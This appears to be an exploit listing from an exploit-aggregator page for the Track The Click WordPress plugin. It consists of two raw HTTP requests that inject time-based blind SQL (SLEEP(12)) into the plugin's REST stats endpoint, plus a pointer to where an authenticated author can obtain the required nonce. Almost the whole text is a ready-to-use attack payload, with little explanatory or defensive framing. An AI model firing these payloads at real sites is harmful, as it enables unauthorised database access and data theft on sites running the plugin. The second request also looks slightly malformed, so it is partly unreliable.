Share
## https://sploitus.com/exploit?id=WPEX-ID:45194442-6EEA-4E07-85A5-4A1E2FDE3523
GET /wp-json/track-the-click/v1/stats?start=20230825')+AND+(SELECT+1+FROM+(SELECT(SLEEP(12)))l)+AND+('1'%3d'1&end=20230901&group=link&group_time=day HTTP/1.1
Host: example.com
X-WP-Nonce: [Nonce]
Cookie: [Author+]
GET /wp-json/track-the-click/v1/stats?link=1')+AND+(SELECT+1+FROM+(SELECT(SLEEP(12)))l)+AND+('1'%3d'1start=20230825&end=20230901&group=link&group_time=day HTTP/1.1
Host: example.com
X-WP-Nonce: [Nonce]
Cookie: [Author+]
Get a valid nonce from "/wp-admin/admin-ajax.php?action=rest-nonce"